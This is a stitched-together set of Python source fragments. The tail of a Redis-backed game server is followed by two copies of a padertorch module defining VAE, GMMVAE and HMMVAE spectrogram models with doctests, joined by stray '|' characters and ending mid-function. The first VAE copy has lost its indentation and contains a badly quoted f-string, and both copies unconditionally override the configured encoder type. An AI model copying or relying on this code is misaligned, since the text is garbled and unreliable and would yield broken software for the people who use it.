    def get_clothes(self, uid, type_):
        """Return worn clothes in one of three wire formats.

        type_ 1: collection dict, 2: list of tpid/clid dicts,
        3: bare "tpid:clid" strings.
        NOTE(review): an unknown type_ leaves ``clths`` unbound and the
        final return raises NameError — confirm callers only pass 1..3.
        """
        clothes = []
        for item in self.redis.smembers(f"uid:{uid}:wearing"):
            # Set entries are "tpid" or "tpid_clid" (with color id).
            if "_" in item:
                id_, clid = item.split("_")
                clothes.append({"id": id_, "clid": clid})
            else:
                clothes.append({"id": item, "clid": None})
        if type_ == 1:
            clths = {"cc": "casual", "ccltns": {"casual": {"cct": [],
                                                           "cn": "",
                                                           "ctp": "casual"}}}
            for item in clothes:
                if item["clid"]:
                    clths["ccltns"]["casual"]["cct"].append(f"{item['id']}:"
                                                            f"{item['clid']}")
                else:
                    clths["ccltns"]["casual"]["cct"].append(item["id"])
        elif type_ == 2:
            clths = {"clths": []}
            for item in clothes:
                clths["clths"].append({"tpid": item["id"],
                                       "clid": item["clid"]})
        elif type_ == 3:
            clths = {"cct": []}
            for item in clothes:
                if item["clid"]:
                    clths["cct"].append(f"{item['id']}:{item['clid']}")
                else:
                    clths["cct"].append(item["id"])
        return clths

    def get_room_items(self, uid, room):
        """Return furniture placed in *room*.

        Raises WrongRoom when the room name contains the reserved "_"
        separator used in item keys.
        """
        if "_" in room:
            raise exceptions.WrongRoom()
        items = []
        for name in self.redis.smembers(f"rooms:{uid}:{room}:items"):
            item = self.redis.lrange(f"rooms:{uid}:{room}:items:{name}", 0, -1)
            # Set members are "tpid_lid"; the list holds x/y/z/d (+rid).
            name, lid = name.split("_")
            if len(item) == 5:
                items.append({"tpid": name, "x": float(item[0]),
                              "y": float(item[1]), "z": float(item[2]),
                              "d": int(item[3]), "lid": int(lid),
                              "rid": item[4]})
            else:
                items.append({"tpid": name, "x": float(item[0]),
                              "y": float(item[1]), "z": float(item[2]),
                              "d": int(item[3]), "lid": int(lid)})
        return items

    def update_crt(self, uid):
        """Stub: recompute the crt counter; currently always 0."""
        logging.warning("stub update_crt")
        return 0

    def update_hrt(self, uid):
        """Stub: recompute the hrt counter; currently always 0."""
        logging.warning("stub update_hrt")
        return 0

    def _background(self):
        """Maintenance loop: log the online count and evict expired
        inventory caches once a minute."""
        while True:
            logging.info(f"Players online: {len(self.online)}")
            # Iterate over a copy — entries may be deleted while looping.
            for uid in self.inv.copy():
                inv = self.inv[uid]
                if inv.expire and time.time() - inv.expire > 0:
                    del self.inv[uid]
            time.sleep(60)
if __name__ == "__main__":
    # Configure root logging before the server emits anything.
    log_format = "%(levelname)-8s [%(asctime)s] %(message)s"
    logging.basicConfig(format=log_format,
                        datefmt="%H:%M:%S", level=logging.DEBUG)
    server = Server()
    server.listen()
|
import numpy as np
import torch
from einops import rearrange
from padertorch.base import Model
from padertorch.contrib.je.modules.conv import CNN1d, CNNTranspose1d
from padertorch.contrib.je.modules.gmm import GMM
from padertorch.contrib.je.modules.hmm import HMM
from padertorch.contrib.je.modules.features import NormalizedLogMelExtractor
from padertorch.contrib.je.modules.global_pooling import Mean
from padertorch.contrib.je.modules.hybrid import HybridCNN, HybridCNNTranspose
from sklearn import metrics
from torch.distributions import Normal
from torchvision.utils import make_grid
class VAE(Model):
"""
>>> config = VAE.get_config(dict(\
encoder=dict(\
factory=HybridCNN,\
input_size=80,\
cnn_2d=dict(\
in_channels=1, out_channels=3*[32], kernel_size=3, \
), \
cnn_1d=dict(\
out_channels=3*[32], kernel_size=3\
),\
),\
feature_extractor=dict(\
sample_rate=16000,\
fft_length=512,\
n_mels=80,\
),\
))
>>> config['encoder']['cnn_1d']['in_channels']
2560
>>> config['encoder']['cnn_1d']['out_channels']
[32, 32, 32]
>>> config['decoder']['cnn_transpose_1d']['in_channels']
16
>>> vae = VAE.from_config(config)
>>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None}
>>> outputs = vae(inputs)
>>> outputs[0][0].shape
torch.Size([4, 1, 80, 100])
>>> outputs[0][1].shape
torch.Size([4, 1, 80, 100])
>>> outputs[1][0][0].shape
torch.Size([4, 16, 100])
>>> outputs[1][0][1].shape
torch.Size([4, 16, 100])
>>> review = vae.review(inputs, outputs)
"""
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
    ):
        """Variational autoencoder over (log-mel) spectrogram features.

        :param encoder: CNN whose output channels split into the n_params
            distribution parameter groups (mu, logvar)
        :param decoder: transposed CNN reconstructing the features
        :param feature_key: key of the raw input in the example dict
        :param feature_extractor: optional module mapping the raw input
            (e.g. STFT) to the feature representation; may be None
        :param feature_size: feature (mel) dimension used to unflatten a
            1d decoder output back to (B, C, F, T)
        """
        super().__init__()
        # allow joint optimization of encoder and decoder
        self.encoder = encoder
        self.decoder = decoder
        self.feature_key = feature_key
        self.feature_extractor = feature_extractor
        self.feature_size = feature_size
        # Number of distribution parameters per latent unit (mu, logvar).
        self.n_params = 2
def encode(self, x, seq_len=None):
if isinstance(self.encoder, CNN1d):
x = rearrange(x, 'b c f t -> b (c f) t')
if self.encoder.return_pool_indices:
h, seq_len, pool_indices = self.encoder(x, seq_len=seq_len)
else:
h, seq_len = self.encoder(x, seq_len=seq_len)
pool_indices = None
assert not h.shape[1] % self.n_params
params = tuple(torch.split(h, h.shape[1] // self.n_params, dim=1))
return params, seq_len, pool_indices
def reparameterize(self, params):
mu, logvar = params[:2]
if self.training:
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps * std + mu
else:
return mu
def decode(self, z, seq_len=None, shapes=None, lengths=None, pool_indices=None):
x_hat, seq_len = self.decoder(
z, seq_len=seq_len, shapes=shapes, seq_lens=lengths, pool_indices=pool_indices
)
if x_hat.dim() == 3:
b, f, t = x_hat.shape
x_hat = x_hat.view((b, -1, self.feature_size, t))
return x_hat, seq_len # (B, C, F, T)
def forward(self, inputs):
x_target = inputs[self.feature_key]
seq_len = inputs['seq_len']
if self.feature_extractor is not None:
x_target = self.feature_extractor(x_target, seq_len)
params, seq_len, pool_indices = self.encode(x_target, seq_len)
x_shape = x_target.shape
if isinstance(self.encoder, CNN1d):
x_shape = (x_shape[0], x_shape[1]*x_shape[2], x_shape[3])
shapes = self.encoder.get_shapes(x_shape)
if seq_len is None:
lengths = None
else:
lengths = self.encoder.get_seq_lens(seq_len)
z = self.reparameterize(params)
x_hat, _ = self.decode(
z, seq_len, shapes=shapes, lengths=lengths, pool_indices=pool_indices
)
return (x_target, x_hat), (params, seq_len)
def review(self, inputs, outputs):
# visualization
(x_target, *x_hats), (params, seq_len), *_ = outputs
(mu, log_var) = params[:2]
kld = -0.5 * (1 + log_var - mu.pow(2) - log_var.exp()).sum(dim=1)
kld = Mean(axis=-1)(kld, seq_len)
mu = mu.contiguous()
review = dict(
losses=dict(
kld=kld.mean(),
),
histograms=dict(
kld_=kld.flatten(),
mu_=mu.flatten(),
log_var_=log_var.flatten(),
),
images=dict(
targets=x_target[:3, :1],
latents=mu[:3],
)
)
seq_len = inputs['seq_len']
for i, x_hat in enumerate(x_hats):
mse = (x_hat - x_target).pow(2).sum(dim=(1, 2))
mse = Mean(axis=-1)(mse, seq_len)
review['losses'][f'rec{i}'] = mse.mean()
review['histograms'][f'rec{i}_'] = mse
review['images'][f'x_hat_{i}_'] = x_hat.contiguous()[:3, :1]
return review
def modify_summary(self, summary):
summary = super().modify_summary(summary)
for key, image in summary['images'].items():
if image.dim() == 3:
image = image.unsqueeze(1)
summary['images'][key] = make_grid(
image.flip(2), normalize=True, scale_each=False, nrow=1
)
return summary
@classmethod
def finalize_dogmatic_config(cls, config):
config['encoder']['factory'] = CNN1d
config['feature_extractor'] = {
'factory': NormalizedLogMelExtractor,
}
in_channels = None
if config['feature_extractor'] is not None:
if config['feature_extractor']['factory'] == NormalizedLogMelExtractor:
config['feature_size'] = config['feature_extractor']['n_mels']
in_channels = 1 + config['feature_extractor']['add_deltas']+config['feature_extractor']['add_delta_deltas']
feature_size = config['feature_size']
if config['encoder']['factory'] == HybridCNN:
if feature_size is not None:
config['encoder'].update({
'input_size': feature_size,
})
if in_channels is not None:
config['encoder']['cnn_2d']['in_channels'] = in_channels
content_emb_dim = config['encoder']['cnn_1d']['out_channels'][-1] // 2
elif config['encoder']['factory'] == CNN1d:
if feature_size is not None and in_channels is not None:
config['encoder']['in_channels'] = feature_size * in_channels
content_emb_dim = config['encoder']['out_channels'][-1] // 2
else:
raise ValueError(f'Factory {config['encoder']['factory']} not allowed.')
config['decoder'] = config['encoder']['factory'].get_transpose_config(config['encoder'])
if config['decoder']['factory'] == HybridCNNTranspose:
config['decoder']['cnn_transpose_1d']['in_channels'] = content_emb_dim
elif config['decoder']['factory'] == CNNTranspose1d:
config['decoder']['in_channels'] = content_emb_dim
else:
raise ValueError(f'Factory {config['decoder']['factory']} not allowed.')
class GMMVAE(VAE):
    """
    >>> config = GMMVAE.get_config(dict(\
            encoder=dict(\
                factory=HybridCNN,\
                input_size=80,\
                cnn_2d=dict(\
                    in_channels=1, out_channels=3*[32], kernel_size=3, \
                ), \
                cnn_1d=dict(\
                    out_channels=3*[32], kernel_size=3\
                ),\
            ),\
            decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
            gmm=dict(num_classes=10),\
            feature_extractor=dict(\
                factory=NormalizedLogMelExtractor,\
                sample_rate=16000,\
                fft_length=512,\
                n_mels=80,\
            ),\
        ))
    >>> config['encoder']['cnn_1d']['in_channels']
    2560
    >>> config['encoder']['cnn_1d']['out_channels']
    [32, 32, 32]
    >>> config['decoder']['cnn_transpose_1d']['in_channels']
    16
    >>> gmmvae = GMMVAE.from_config(config)
    >>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None, 'labels': torch.Tensor([1,2,3,4]).long()}
    >>> outputs = gmmvae(inputs)
    >>> outputs[0][0].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[0][1].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[1][0][0].shape
    torch.Size([4, 16, 100])
    >>> outputs[1][0][1].shape
    torch.Size([4, 16, 100])
    >>> outputs[2][0].shape
    torch.Size([4, 100, 10])
    >>> outputs[2][1].shape
    torch.Size([4, 100, 10])
    >>> review = gmmvae.review(inputs, outputs)
    >>> gmmvae.supervised = True
    >>> gmmvae.label_key = 'labels'
    >>> outputs = gmmvae(inputs)
    >>> review = gmmvae.review(inputs, outputs)
    """
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, gmm: GMM, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
            label_key=None, supervised=False,
    ):
        # VAE with a trainable Gaussian-mixture prior over the latent space.
        # `label_key`/`supervised` control whether mixture components are
        # tied to provided class labels during training.
        super().__init__(
            encoder=encoder, decoder=decoder,
            feature_key=feature_key, feature_extractor=feature_extractor,
            feature_size=feature_size,
        )
        self.gmm = gmm
        self.label_key = label_key
        self.supervised = supervised
    def forward(self, inputs):
        # Run the plain VAE forward, then score the approximate posterior
        # q(z) under the GMM (time moved to the sequence axis).
        (x, x_hat), ((mu, log_var), seq_len) = super().forward(inputs)
        qz = Normal(
            loc=rearrange(mu, 'b d t -> b t d'),
            scale=torch.exp(0.5 * rearrange(log_var, 'b d t -> b t d'))
        )
        log_class_posterior, log_rho = self.gmm(qz)
        return (x, x_hat), ((mu, log_var), seq_len), (log_class_posterior, log_rho)
    def review(self, inputs, outputs):
        # VAE.review adds the reconstruction terms; mixture terms added here.
        review = super().review(inputs, outputs)
        _, (params, seq_len), (log_class_posterior, log_rho) = outputs
        class_labels = inputs[self.label_key] if self.supervised else None
        # detach: responsibilities act as fixed weights in the loss
        class_posterior = log_class_posterior.exp().detach()
        if class_labels is None:
            # unsupervised: expectation under the (detached) class posterior
            kld = -(class_posterior * log_rho).sum(-1)
            class_ce = -(class_posterior * self.gmm.log_class_probs).sum(-1)
        else:
            # supervised: use the provided component per frame
            if class_labels.dim() < 2:
                class_labels = class_labels[:, None]
            class_labels = class_labels.expand(log_rho.shape[:2])
            kld = -log_rho.gather(-1, class_labels[..., None]).squeeze(-1)
            class_ce = -self.gmm.log_class_probs[class_labels]
        kld = Mean(axis=-1)(kld, seq_len)
        class_ce = Mean(axis=-1)(class_ce, seq_len)
        max_class_posterior, classes = torch.max(
            torch.exp(log_class_posterior), -1
        )
        review['losses'].update(dict(
            kld=kld.mean(),
            class_ce=class_ce.mean(),
            log_class_prob=self.gmm.log_class_probs.sum()
        ))
        review['scalars'] = dict(
            classes=classes.flatten(),
        )
        if self.label_key is not None:
            labels = inputs[self.label_key]
            review['scalars'].update(dict(
                labels=labels.flatten()
            ))
        review['histograms'].update(dict(
            kld_=kld.flatten(),
            log_class_probs_=self.gmm.log_class_probs.flatten(),
            max_class_posterior_=max_class_posterior.flatten(),
            classes_=classes.flatten()
        ))
        return review
    def modify_summary(self, summary):
        # Aggregate frame-wise class predictions into clustering metrics.
        predictions = summary['scalars'].pop('classes', None)
        if predictions is not None:
            summary['scalars']['n_classes'] = len(np.unique(predictions))
        labels = summary['scalars'].pop('labels', None)
        if predictions is not None and labels is not None:
            _, labels = np.unique(labels, return_inverse=True)
            _, predictions = np.unique(predictions, return_inverse=True)
            contingency_matrix = metrics.cluster.contingency_matrix(
                labels, predictions
            )
            # normalized mutual information: (H(y) - H(y|c)) / H(y)
            p_true_pred = contingency_matrix / contingency_matrix.sum()
            p_true = p_true_pred.sum(axis=1, keepdims=True)
            p_true_given_pred = contingency_matrix / np.maximum(contingency_matrix.sum(axis=0, keepdims=True), 1)
            h_true = -np.sum(p_true * np.log(np.maximum(p_true, 1e-12)))
            h_true_given_pred = -np.sum(p_true_pred * np.log(np.maximum(p_true_given_pred, 1e-12)))
            nmi = (h_true - h_true_given_pred) / h_true
            summary['scalars']['nmi'] = nmi
            # accuracy after majority-vote mapping of clusters to labels
            prediction_mapping = np.argmax(contingency_matrix, axis=0)
            predictions = prediction_mapping[predictions]
            summary['scalars']['accuracy'] = np.mean(predictions == labels)
        summary = super().modify_summary(summary)
        return summary
    @classmethod
    def finalize_dogmatic_config(cls, config):
        super().finalize_dogmatic_config(config)
        # GMM feature size must match the decoder's latent input dimension.
        if config['decoder']['factory'] == HybridCNNTranspose:
            config['gmm'] = {
                'factory': GMM,
                'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
            }
        elif config['decoder']['factory'] == CNNTranspose1d:
            config['gmm'] = {
                'factory': GMM,
                'feature_size': config['decoder']['in_channels']
            }
class HMMVAE(GMMVAE):
    """
    >>> config = HMMVAE.get_config(dict(\
            encoder=dict(\
                factory=HybridCNN,\
                input_size=80,\
                cnn_2d=dict(\
                    in_channels=1, out_channels=3*[32], kernel_size=3, \
                ), \
                cnn_1d=dict(\
                    out_channels=3*[32], kernel_size=3\
                ),\
            ),\
            decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
            hmm=dict(num_units=10, viterbi_training=True, final_state=True, initial_state=True),\
            feature_extractor=dict(\
                factory=NormalizedLogMelExtractor,\
                sample_rate=16000,\
                fft_length=512,\
                n_mels=80,\
            ),\
        ))
    >>> config['encoder']['cnn_1d']['in_channels']
    2560
    >>> config['encoder']['cnn_1d']['out_channels']
    [32, 32, 32]
    >>> config['decoder']['cnn_transpose_1d']['in_channels']
    16
    >>> hmmvae = HMMVAE.from_config(config)
    >>> inputs = {'stft': torch.rand((4, 1, 100, 257, 2)), 'seq_len': None}
    >>> outputs = hmmvae(inputs)
    >>> outputs[0][0].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[0][1].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[1][0][0].shape
    torch.Size([4, 16, 100])
    >>> outputs[1][0][1].shape
    torch.Size([4, 16, 100])
    >>> outputs[2][0].shape
    torch.Size([4, 100, 30])
    >>> outputs[2][1].shape
    torch.Size([4, 30, 30])
    >>> outputs[2][2].shape
    torch.Size([4, 100, 30])
    >>> review = hmmvae.review(inputs, outputs)
    """
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, hmm: HMM, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
            label_key=None, supervised=False,
    ):
        # Skip GMMVAE.__init__ (which would require a GMM) and initialize the
        # plain VAE directly; the latent prior here is an HMM instead.
        super(GMMVAE, self).__init__(
            encoder=encoder, decoder=decoder,
            feature_key=feature_key, feature_extractor=feature_extractor,
            feature_size=feature_size,
        )
        self.hmm = hmm
        self.label_key = label_key
        self.supervised = supervised
    def forward(self, inputs):
        # Run the plain VAE forward (bypassing GMMVAE.forward) and score the
        # approximate posterior under the HMM.
        (x, x_hat), ((mu, log_var), seq_len) = super(GMMVAE, self).forward(inputs)
        qz = Normal(
            loc=mu.permute((0, 2, 1)),
            scale=torch.exp(0.5 * log_var.permute((0, 2, 1)))
        )
        # in supervised training the unit sequence is taken from the labels
        unit_sequence = inputs[self.label_key] if (self.supervised and self.training) else None
        no_onset = inputs['no_onset'] if 'no_onset' in inputs else False
        no_offset = inputs['no_offset'] if 'no_offset' in inputs else False
        class_posterior, transitions, log_rho = self.hmm(
            qz, seq_len=seq_len, unit_sequence=unit_sequence,
            no_onset=no_onset, no_offset=no_offset
        )
        return (x, x_hat), ((mu, log_var), seq_len), (class_posterior, transitions, log_rho)
    def review(self, inputs, outputs):
        # Reuse VAE.review (bypassing GMMVAE.review) for the reconstruction
        # terms; HMM-specific terms are added below.
        review = super(GMMVAE, self).review(inputs, outputs)
        _, (params, seq_len), (class_posterior, transitions, log_rho) = outputs
        kld = -(class_posterior * log_rho).sum(-1)
        kld = Mean(axis=-1)(kld, seq_len)
        # clamp log-probs at -100 so -inf cannot propagate into the losses
        log_class_probs = torch.max(self.hmm.log_class_probs, -100 * torch.ones_like(self.hmm.log_class_probs))
        log_transition_mat = torch.max(self.hmm.log_transition_mat, -100 * torch.ones_like(self.hmm.log_transition_mat))
        class_ce = -(class_posterior[:, 0] * log_class_probs).sum(-1) - (transitions*log_transition_mat).sum((1,2))
        class_ce = class_ce / (transitions.sum((1, 2)) + 1)
        max_class_posterior, classes = torch.max(class_posterior, -1)
        review['losses'].update(dict(
            kld=kld.mean(),
            class_ce=class_ce.mean(),
            log_class_prob=log_class_probs.sum(),
        ))
        review['scalars'] = dict(
            # map HMM states to their unit index for monitoring
            classes=classes.flatten()//self.hmm.states_per_unit,
        )
        review['histograms'].update(dict(
            kld_=kld.flatten(),
            log_class_probs_=log_class_probs.flatten(),
            max_class_posterior_=max_class_posterior.flatten(),
            classes_=classes.flatten()
        ))
        if self.label_key is not None:
            labels = inputs[self.label_key]
            review['scalars'].update(dict(
                labels=labels.flatten()
            ))
        return review
    @classmethod
    def finalize_dogmatic_config(cls, config):
        # Reuse VAE's finalization (skip GMMVAE's, which would add a GMM).
        super(GMMVAE, cls).finalize_dogmatic_config(config)
        if config['decoder']['factory'] == HybridCNNTranspose:
            config['hmm'] = {
                'factory': HMM,
                'feature_size': config['decoder']['cnn_transpose_1d']['in_channels']
            }
        elif config['decoder']['factory'] == CNNTranspose1d:
            config['hmm'] = {
                'factory': HMM,
                'feature_size': config['decoder']['in_channels']
            }
| import numpy as np
import torch
from einops import rearrange
from padertorch.base import Model
from padertorch.contrib.je.modules.conv import CNN1d, CNNTranspose1d
from padertorch.contrib.je.modules.gmm import GMM
from padertorch.contrib.je.modules.hmm import HMM
from padertorch.contrib.je.modules.features import NormalizedLogMelExtractor
from padertorch.contrib.je.modules.global_pooling import Mean
from padertorch.contrib.je.modules.hybrid import HybridCNN, HybridCNNTranspose
from sklearn import metrics
from torch.distributions import Normal
from torchvision.utils import make_grid
class VAE(Model):
    """
    >>> config = VAE.get_config(dict(\
            encoder=dict(\
                factory=HybridCNN,\
                input_size=80,\
                cnn_2d=dict(\
                    in_channels=1, out_channels=3*[32], kernel_size=3, \
                ), \
                cnn_1d=dict(\
                    out_channels=3*[32], kernel_size=3\
                ),\
            ),\
            feature_extractor=dict(\
                sample_rate=16000,\
                fft_length=512,\
                n_mels=80,\
            ),\
        ))
    >>> config['encoder']['cnn_1d']['in_channels']
    2560
    >>> config['encoder']['cnn_1d']['out_channels']
    [32, 32, 32]
    >>> config['decoder']['cnn_transpose_1d']['in_channels']
    16
    >>> vae = VAE.from_config(config)
    >>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None}
    >>> outputs = vae(inputs)
    >>> outputs[0][0].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[0][1].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[1][0][0].shape
    torch.Size([4, 16, 100])
    >>> outputs[1][0][1].shape
    torch.Size([4, 16, 100])
    >>> review = vae.review(inputs, outputs)
    """
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
    ):
        """
        Args:
            encoder: maps features to 2*D channels (latent mean and log-var).
            decoder: maps latent samples back to the feature domain.
            feature_key: key in the ``inputs`` dict holding the raw features.
            feature_extractor: optional module applied to the raw features
                before encoding (e.g. ``NormalizedLogMelExtractor``).
            feature_size: feature (frequency) dimension F used to unflatten
                a 1d decoder output back to (B, C, F, T).
        """
        super().__init__()
        # allow joint optimization of encoder and decoder
        self.encoder = encoder
        self.decoder = decoder
        self.feature_key = feature_key
        self.feature_extractor = feature_extractor
        self.feature_size = feature_size
        # two distribution parameters per latent dim: mean and log-variance
        self.n_params = 2
    def encode(self, x, seq_len=None):
        """Return ``((mu, log_var), seq_len, pool_indices)`` for input ``x``."""
        if isinstance(self.encoder, CNN1d):
            # a 1d encoder expects channel and frequency dims merged
            x = rearrange(x, 'b c f t -> b (c f) t')
        if self.encoder.return_pool_indices:
            h, seq_len, pool_indices = self.encoder(x, seq_len=seq_len)
        else:
            h, seq_len = self.encoder(x, seq_len=seq_len)
            pool_indices = None
        # the channel dim carries n_params stacked parameter maps
        assert not h.shape[1] % self.n_params
        params = tuple(torch.split(h, h.shape[1] // self.n_params, dim=1))
        return params, seq_len, pool_indices
    def reparameterize(self, params):
        """Sample z ~ N(mu, sigma^2) while training; return mu in eval mode."""
        mu, logvar = params[:2]
        if self.training:
            std = torch.exp(0.5 * logvar)
            eps = torch.randn_like(std)
            return eps * std + mu
        else:
            return mu
    def decode(self, z, seq_len=None, shapes=None, lengths=None, pool_indices=None):
        """Decode latent ``z`` to a reconstruction of shape (B, C, F, T)."""
        x_hat, seq_len = self.decoder(
            z, seq_len=seq_len, shapes=shapes, seq_lens=lengths, pool_indices=pool_indices
        )
        if x_hat.dim() == 3:
            # unflatten the merged (C F) channel dim of a 1d decoder
            b, f, t = x_hat.shape
            x_hat = x_hat.view((b, -1, self.feature_size, t))
        return x_hat, seq_len  # (B, C, F, T)
    def forward(self, inputs):
        """Return ``((x_target, x_hat), ((mu, log_var), seq_len))``."""
        x_target = inputs[self.feature_key]
        seq_len = inputs['seq_len']
        if self.feature_extractor is not None:
            x_target = self.feature_extractor(x_target, seq_len)
        params, seq_len, pool_indices = self.encode(x_target, seq_len)
        # shapes/lengths allow the transposed decoder to invert pooling exactly
        x_shape = x_target.shape
        if isinstance(self.encoder, CNN1d):
            x_shape = (x_shape[0], x_shape[1]*x_shape[2], x_shape[3])
        shapes = self.encoder.get_shapes(x_shape)
        if seq_len is None:
            lengths = None
        else:
            lengths = self.encoder.get_seq_lens(seq_len)
        z = self.reparameterize(params)
        x_hat, _ = self.decode(
            z, seq_len, shapes=shapes, lengths=lengths, pool_indices=pool_indices
        )
        return (x_target, x_hat), (params, seq_len)
    def review(self, inputs, outputs):
        """Compute KLD and reconstruction losses plus histograms/images."""
        # visualization
        (x_target, *x_hats), (params, seq_len), *_ = outputs
        (mu, log_var) = params[:2]
        # KL divergence to the standard normal prior, summed over latent dims
        kld = -0.5 * (1 + log_var - mu.pow(2) - log_var.exp()).sum(dim=1)
        kld = Mean(axis=-1)(kld, seq_len)
        mu = mu.contiguous()
        review = dict(
            losses=dict(
                kld=kld.mean(),
            ),
            histograms=dict(
                kld_=kld.flatten(),
                mu_=mu.flatten(),
                log_var_=log_var.flatten(),
            ),
            images=dict(
                targets=x_target[:3, :1],
                latents=mu[:3],
            )
        )
        seq_len = inputs['seq_len']
        for i, x_hat in enumerate(x_hats):
            # squared reconstruction error, averaged over the time axis
            mse = (x_hat - x_target).pow(2).sum(dim=(1, 2))
            mse = Mean(axis=-1)(mse, seq_len)
            review['losses'][f'rec{i}'] = mse.mean()
            review['histograms'][f'rec{i}_'] = mse
            review['images'][f'x_hat_{i}_'] = x_hat.contiguous()[:3, :1]
        return review
    def modify_summary(self, summary):
        """Convert image tensors into (frequency-flipped) grids for logging."""
        summary = super().modify_summary(summary)
        for key, image in summary['images'].items():
            if image.dim() == 3:
                image = image.unsqueeze(1)
            summary['images'][key] = make_grid(
                image.flip(2), normalize=True, scale_each=False, nrow=1
            )
        return summary
    @classmethod
    def finalize_dogmatic_config(cls, config):
        """Fill in defaults and tie encoder/decoder/extractor dimensions."""
        config['encoder']['factory'] = CNN1d
        config['feature_extractor'] = {
            'factory': NormalizedLogMelExtractor,
        }
        in_channels = None
        if config['feature_extractor'] is not None:
            if config['feature_extractor']['factory'] == NormalizedLogMelExtractor:
                config['feature_size'] = config['feature_extractor']['n_mels']
                in_channels = 1 + config['feature_extractor']['add_deltas']+config['feature_extractor']['add_delta_deltas']
        feature_size = config['feature_size']
        if config['encoder']['factory'] == HybridCNN:
            if feature_size is not None:
                config['encoder'].update({
                    'input_size': feature_size,
                })
            if in_channels is not None:
                config['encoder']['cnn_2d']['in_channels'] = in_channels
            content_emb_dim = config['encoder']['cnn_1d']['out_channels'][-1] // 2
        elif config['encoder']['factory'] == CNN1d:
            if feature_size is not None and in_channels is not None:
                config['encoder']['in_channels'] = feature_size * in_channels
            content_emb_dim = config['encoder']['out_channels'][-1] // 2
        else:
            raise ValueError(f'Factory {config["encoder"]["factory"]} not allowed.')
        config['decoder'] = config['encoder']['factory'].get_transpose_config(config['encoder'])
        if config['decoder']['factory'] == HybridCNNTranspose:
            config['decoder']['cnn_transpose_1d']['in_channels'] = content_emb_dim
        elif config['decoder']['factory'] == CNNTranspose1d:
            config['decoder']['in_channels'] = content_emb_dim
        else:
            raise ValueError(f'Factory {config["decoder"]["factory"]} not allowed.')
class GMMVAE(VAE):
    """
    >>> config = GMMVAE.get_config(dict(\
            encoder=dict(\
                factory=HybridCNN,\
                input_size=80,\
                cnn_2d=dict(\
                    in_channels=1, out_channels=3*[32], kernel_size=3, \
                ), \
                cnn_1d=dict(\
                    out_channels=3*[32], kernel_size=3\
                ),\
            ),\
            decoder=dict(cnn_transpose_1d=dict(in_channels=16)),\
            gmm=dict(num_classes=10),\
            feature_extractor=dict(\
                factory=NormalizedLogMelExtractor,\
                sample_rate=16000,\
                fft_length=512,\
                n_mels=80,\
            ),\
        ))
    >>> config['encoder']['cnn_1d']['in_channels']
    2560
    >>> config['encoder']['cnn_1d']['out_channels']
    [32, 32, 32]
    >>> config['decoder']['cnn_transpose_1d']['in_channels']
    16
    >>> gmmvae = GMMVAE.from_config(config)
    >>> inputs = {'stft': torch.zeros((4, 1, 100, 257, 2)), 'seq_len': None, 'labels': torch.Tensor([1,2,3,4]).long()}
    >>> outputs = gmmvae(inputs)
    >>> outputs[0][0].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[0][1].shape
    torch.Size([4, 1, 80, 100])
    >>> outputs[1][0][0].shape
    torch.Size([4, 16, 100])
    >>> outputs[1][0][1].shape
    torch.Size([4, 16, 100])
    >>> outputs[2][0].shape
    torch.Size([4, 100, 10])
    >>> outputs[2][1].shape
    torch.Size([4, 100, 10])
    >>> review = gmmvae.review(inputs, outputs)
    >>> gmmvae.supervised = True
    >>> gmmvae.label_key = 'labels'
    >>> outputs = gmmvae(inputs)
    >>> review = gmmvae.review(inputs, outputs)
    """
    def __init__(
            self, encoder: HybridCNN, decoder: HybridCNNTranspose, gmm: GMM, *,
            feature_key='stft', feature_extractor=None, feature_size=None,
            label_key=None, supervised=False,
    ):
        # VAE with a trainable Gaussian-mixture prior over the latent space.
        # `label_key`/`supervised` control whether mixture components are
        # tied to provided class labels during training.
        super().__init__(
            encoder=encoder, decoder=decoder,
            feature_key=feature_key, feature_extractor=feature_extractor,
            feature_size=feature_size,
        )
        self.gmm = gmm
        self.label_key = label_key
        self.supervised = supervised
    def forward(self, inputs):
        # Run the plain VAE forward, then score the approximate posterior
        # q(z) under the GMM (time moved to the sequence axis).
        (x, x_hat), ((mu, log_var), seq_len) = super().forward(inputs)
        qz = Normal(
            loc=rearrange(mu, 'b d t -> b t d'),
            scale=torch.exp(0.5 * rearrange(log_var, 'b d t -> b t d'))
        )
        log_class_posterior, log_rho = self.gmm(qz)
        return (x, x_hat), ((mu, log_var), seq_len), (log_class_posterior, log_rho)
    def review(self, inputs, outputs):
        # VAE.review adds the reconstruction terms; mixture terms added here.
        review = super().review(inputs, outputs)
        _, (params, seq_len), (log_class_posterior, log_rho) = outputs
        class_labels = inputs[self.label_key] if self.supervised else None
        # detach: responsibilities act as fixed weights in the loss
        class_posterior = log_class_posterior.exp().detach()
        if class_labels is None:
            # unsupervised: expectation under the (detached) class posterior
            kld = -(class_posterior * log_rho).sum(-1)
            class_ce = -(class_posterior * self.gmm.log_class_probs).sum(-1)
        else:
            # supervised: use the provided component per frame
            if class_labels.dim() < 2:
                class_labels = class_labels[:, None]
            class_labels = class_labels.expand(log_rho.shape[:2])
            kld = -log_rho.gather(-1, class_labels[..., None]).squeeze(-1)
            class_ce = -self.gmm.log_class_probs[class_labels]
        kld = Mean(axis=-1)(kld, seq_len)
        class_ce = Mean(axis=-1)(class_ce, seq_len)
        max_class_posterior, classes = torch.max(
            torch.exp(log_class_posterior), -1
